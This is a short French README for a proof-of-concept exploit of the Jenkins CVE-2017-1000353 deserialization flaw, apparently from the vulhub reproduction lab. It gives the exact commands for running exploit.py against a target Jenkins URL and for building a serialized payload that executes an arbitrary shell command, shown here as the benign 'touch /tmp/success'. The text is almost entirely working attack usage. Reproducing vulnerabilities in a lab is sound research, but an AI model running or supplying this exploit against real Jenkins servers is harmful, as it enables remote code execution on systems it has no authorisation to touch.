
jenkins CVE-2017-1000353 POC
Comment reproduire la vulnérabilité CVE-2017-1000353 de Jenkins ?
Clonez ce dépôt et utilisez le payload pré-construit jenkins_poc.ser avec la commande suivante :
python exploit.py http://your-ip:8080 jenkins_poc.ser
Ensuite, la commande touch /tmp/success sera exécutée.
Important : La génération du payload dépend de la version de Java. Le test a été réalisé avec succès avec openjdk:8u292. D'autres versions de Java peuvent ne pas fonctionner correctement pour la génération du payload et l'exploitation.
jenkins_poc.ser ?Téléchargez CVE-2017-1000353-SNAPSHOT-all.jar.
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Si vous utilisez Docker, vous pouvez utiliser la commande suivante pour assurer la compatibilité :
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353